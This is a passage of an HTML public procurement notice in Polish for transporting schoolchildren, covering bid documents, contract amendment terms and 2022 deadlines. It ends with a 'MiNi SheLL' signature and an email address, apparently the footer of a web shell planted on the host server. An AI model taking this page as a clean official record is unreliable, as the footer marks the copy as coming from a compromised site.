odpowiedzialnymi za sprawowanie opieki nad przewożonymi uczniami wraz z zaświadczeniami dot. umiejętności udzielenia pierwszej pomocy przedmedycznej przez te osoby. <br/>Uwaga:<br/>a)	Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym załącznik nr 8 do SWZ – wykaz osób.<br/>b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten z Wykonawców, który w imieniu wszystkich wykazywać będzie spełnianie warunku określonego Rozdziale XX ust. 1 pkt 4b) SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp - jeżeli dotyczy, zobowiązanie podmiotu udostępniającego zasoby - jeżeli dotyczy, pełnomocnictwo - jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>W przypadku, o którym mowa powyżej Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i składają wraz z ofertą pełnomocnictwo.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy, jeżeli jest wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której Zamawiający dokonał wyboru Wykonawcy:<br/>1)	zmiany w zakresie wskazanych w ofercie pojazdów i opiekunów (pod warunkiem spełniania wymagań określonych w SWZ),<br/>2)	zmiany postanowień zawartej umowy w przypadku zmiany obowiązujących przepisów regulujących zakres umowy, dotyczących w szczególności systemu oświaty, transportu drogowego, publicznego transportu zbiorowego,<br/>3)	zmiany przebiegu linii komunikacyjnych i rozkładu jazdy,<br/>4)	w przypadku ustawowej zmiany przepisów dotyczących procentowej stawki podatku od towarów i usług, zmiana wynagrodzenia nastąpi o kwotę wynikającą z różnicy między dotychczasową, a nową stawką podatku od towarów i usług.<br/>5)	zmiany wynagrodzenia w przypadku zmiany liczby dowożonych uczniów – zmianie ulegnie kwota wynagrodzenia brutto określonego w § 5 ust. 6 umowy.<br/>6)	wystąpienia innych okoliczności, których nie można było przewidzieć w momencie zawarcia umowy.<br/>7)	a) Na wniosek jednej ze stron, w drodze negocjacji, cena biletów miesięcznych szkolnych może ulec zmianie w przypadku drastycznej zmianie cen paliw płynnych, tj. w przypadku zmiany jednostkowej ceny paliwa (ceny hurtowej oleju napędowego producenta PKN Orlen) o więcej niż 20 % w stosunku do ceny obowiązującej w dniu 31 grudnia 2022 r.<br/>b) zmiana ceny jednostkowej obowiązywać będzie od pierwszego dnia miesiąca następującego po miesiącu, w którym zmiana ceny jednostkowej paliwa przekroczyła ustalony w ust. 1 próg, a punktem odniesienia będzie każdorazowo cena jednostkowa paliwa obowiązująca na ostatni dzień miesiąca, w którym ta zmiana nastąpiła.<br/>2.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażona na piśmie w formie aneksu do umowy pod rygorem nieważności takiej zmiany, za wyjątkiem ust. 1 pkt 1,3,4,5. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-16 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com